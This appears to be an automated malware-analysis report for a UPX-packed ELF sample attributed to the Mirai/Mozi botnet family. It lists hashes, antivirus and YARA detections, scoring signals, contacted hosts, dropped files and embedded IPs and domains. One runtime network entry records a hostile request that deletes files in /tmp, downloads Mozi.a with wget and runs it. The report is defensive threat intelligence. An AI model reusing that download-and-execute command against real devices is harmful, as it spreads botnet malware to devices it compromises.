MALICIOUS — 28708524a0409fa372c828dfc817712c2aef6e46e60d630efb1121cb2492465b
MALICIOUS — 28708524a0409fa372c828dfc817712c2aef6e46e60d630efb1121cb2492465b is a elf sample analyzed by MalwareAnalyzer by Cyble with a malicious verdict (100/100), attributed to the Mirai family. 8 of 57 detection engines flagged it.
Identification
- SHA-256:
28708524a0409fa372c828dfc817712c2aef6e46e60d630efb1121cb2492465b - SHA-1:
d3ff58562f3ffde75f36ba6c84df188a90280ad9 - MD5:
96d2b3cac8502bbf45bbb74032572930 - ssdeep:
6144:7O/QJHZweEL/NOjCHm7FZZncaoNsKqqfPqO5:78QpZsKCaiaHKqoPqO5 - TLSH:
T12E44F105E25B288AE5B04BD45CA04CEF63CF954D8D2ACDDD89860AB74449BB70DB41F3 - Submitted as: 28708524a0409fa372c828dfc817712c2aef6e46e60d630efb1121cb2492465b
- File type: elf · Size: 256320 bytes
- Verdict: malicious (100/100) · Family: Mirai
Detections (8 of 57 engines)
- MalwareAnalyser heuristics (entropy/packer): UPX 3.95
- ClamAV (daily): Unix.Trojan.Mirai-7100807-0
- YARA: Intezer community: INTEZER_ELF_UPX_Modified
- YARA: Stratosphere IPS: STRATO_Mirai_Botnet
- Detect It Easy (packer/type): DIE:UPX 3.95
- Microsoft Defender: Trojan:Linux/Dakkatoni.A!MTB
- Emsisoft (Emergency Kit): Trojan.Linux.Mozi.6
- Kaspersky (KVRT): HEUR:Backdoor.Linux.Mirai.r
Why this verdict
The malicious score of 100/100 is the fusion of 14 weighted signals:
- ClamAV (daily) flagged Unix.Trojan.Mirai-7100807-0 (rule
Unix.Trojan.Mirai-7100807-0) - engine signal, weight 0.90, confidence 0.95 - Memory forensics: 4 finding(s) attributed to the sample across 1 technique(s), e.g. injected region in dropbear (pid 707) (rule
linux.malfind.Malfind) - memory signal, weight 0.60, confidence 0.85 - YARA: Stratosphere IPS flagged STRATO_Mirai_Botnet (rule
STRATO_Mirai_Botnet) - engine signal, weight 0.70, confidence 0.70 - Microsoft Defender flagged Trojan:Linux/Dakkatoni.A!MTB (rule
Trojan:Linux/Dakkatoni.A!MTB) - engine signal, weight 0.55, confidence 0.85 - Emsisoft (Emergency Kit) flagged Trojan.Linux.Mozi.6 (rule
Trojan.Linux.Mozi.6) - engine signal, weight 0.55, confidence 0.85 - Kaspersky (KVRT) flagged HEUR:Backdoor.Linux.Mirai.r (rule
HEUR:Backdoor.Linux.Mirai.r) - engine signal, weight 0.55, confidence 0.85 - Contacted 976 external host(s) and 1 HTTP request(s) at runtime - network signal, weight 0.40, confidence 0.80
- YARA: Intezer community flagged INTEZER_ELF_UPX_Modified (rule
INTEZER_ELF_UPX_Modified) - engine signal, weight 0.40, confidence 0.70 - Detect It Easy (packer/type) flagged DIE:UPX 3.95 (rule
DIE:UPX 3.95) - engine signal, weight 0.35, confidence 0.70 - MalwareAnalyser heuristics (entropy/packer) flagged UPX 3.95 (rule
UPX 3.95) - engine signal, weight 0.35, confidence 0.70 - Embedded network infrastructure: http://upx.sf.net, http://ipinfo.io/ip, http://127.0.0.1 - static signal, weight 0.35, confidence 0.60
- Packing/obfuscation: UPX 3.95 - static signal, weight 0.25, confidence 0.55
- Extracted generic config (5 C2) (generic/advisory) - engine signal, weight 0.15, confidence 0.30
- Memory forensics: 3 finding(s) elsewhere in the guest, not attributed to this sample, e.g. injected region in dropbear (pid 786) (rule
linux.malfind.Malfind) - memory signal, weight 0.05, confidence 0.30
Dynamic analysis (linux)
845 behavior events · 0 ATT&CK techniques · 2 dropped files.
Runtime network
- desktop-hsgcbep
- dht.transmissionbt.com
- ntp.ubuntu.com
- router.bittorrent.com
- router.utorrent.com
- bttracker.debian.org
- 2.0.0.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.f.f.ip6.arpa
- b.f.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.f.f.ip6.arpa
- 3.0.0.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.f.f.ip6.arpa
- 252.0.0.224.in-addr.arpa
- 82.152.1.122:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
- 73.13.155.29
- 142.175.85.120
- 168.73.163.234
- 161.148.48.167
- 215.6.148.94
- 92.31.147.182
- 21.122.28.33
- 134.131.15.31
- 214.253.253.154
Dropped files
- tmp_.config -
74c9b3a712c3e883f3d0181d64bb83d4aa02f1619615f4f584441e4ae4de0936 - tmp_.ips -
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
Embedded URLs
- http://upx.sf.net
- http://ipinfo.io/ip
- http://127.0.0.1
Embedded domains
- upx.sf.net
- baidu.com
- ipinfo.io
- wifi.sh
- dht.transmissionbt.com
- router.bittorrent.com
- router.utorrent.com
- bttracker.debian.org
- bin.sh
- bix.sh
Embedded IP addresses
- 8.8.8.8
- 114.114.114.114
- 212.129.33.59
- 82.221.103.244
- 130.239.18.159
- 87.98.162.88
- 239.255.255.250
- 73.13.155.29
- 142.175.85.120
- 168.73.163.234
- 161.148.48.167
- 215.6.148.94
- 92.31.147.182
- 21.122.28.33
- 134.131.15.31
- 214.253.253.154
- 211.232.249.183
- 159.41.187.174
- 38.128.78.206
- 101.156.72.35
- 136.38.180.138
- 93.98.195.246
- 204.181.180.207
- 128.150.21.114
- 52.250.82.253
More Mirai samples · Latest analyzed threats · ATT&CK coverage
Analyzed on MalwareAnalyzer by Cyble · Open interactive report